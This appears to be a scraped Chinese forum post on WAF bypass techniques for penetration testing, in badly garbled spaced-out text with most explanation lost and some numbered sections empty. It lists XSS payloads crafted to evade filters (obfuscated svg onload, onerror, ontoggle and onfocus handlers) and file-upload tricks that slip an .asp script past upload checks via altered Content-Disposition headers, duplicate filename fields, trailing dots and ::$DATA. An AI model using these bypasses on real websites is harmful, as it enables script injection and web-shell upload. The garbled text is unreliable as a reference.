[46] 2020-06-15_浅谈渗透测试之waf绕过姿势

文档创建者:s7ckTeam
浏览次数:11
最后更新:2025-01-15
2020-06-15_浅谈渗透测试之waf绕过姿势 w a f 姿   f 8   7 8 9 0   2 0 2 0 - 0 6 - 1 5 . 1 x s s w a f w a f w a f . 1 x s s w a f 使 D O M 1 .   < s v g / o n l o a d = s e t T i m e o u t ( S t r i n g . f r o m C h a r C o d e ( 9 7 , 1 0 8 , 1 0 1 , 1 1 4 , 1 1 6 , 4 0 , 4 9 , 4 1 ) ) > < s v g / o n l o a d = s e t T i m e o u t ( S t r i n g . f r o m C h a r C o d e ( 9 7 , 1 0 8 , 1 0 1 , 1 1 4 , 1 1 6 , 4 0 , 4 9 , 4 1 ) ) > 2 .   D O M < v i d e o   s r c = 1   o n e r r o r = a l e r t ( / x s s / ) >     < b o d y / o n f o c u s = a l e r t ( / x s s / ) >   < d e t a i l s   o p e n   o n t o g g l e = a l e r t ( / x s s / ) >   < b u t t o n   o n f o c u s = a l e r t ( / x s s / ) a u t o f o c u s >   2 w a f 1 .   [ 0 x 0 9 ] f i l e n a m e = [ 0 x 0 9 ] b a c k l i o n . a s p 2 .   f i l e n a m e = b a c k l i o n . a s p 3 .   f i l e n a m e 1 f i l e n a m e = b a c k l i o n . a s p ; f i l e n a m e 1 = t e s t . j p g 4 .   f o r m f + o r m C o n t e n t - D i s p o s i t i o n :   f + o r m - d a t a ; 5 .     f i l e n a m e = b a c k l i o n . A s p 6 .   f o r m - d a t a C o n T e n t - D i s p o s i t i o n :   n a m e = f i l e p a t h ;   f i l e n a m e = b a c k l i o n . a s p 7 .   C o n t e n t - D i s p o s i t i o n : f o r m - d a t a ; 8   .   b a c k l i o n . a s p .   ( + . ) f i l e n a m e = b a c k l i o n . a s p   . 9 .   : : $ D A T A f i l e n a m e = b a c k l i o n . a s p : : $ D A T A
1 0 .   1 1 .  
3 w a f 1 .   2 .  
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则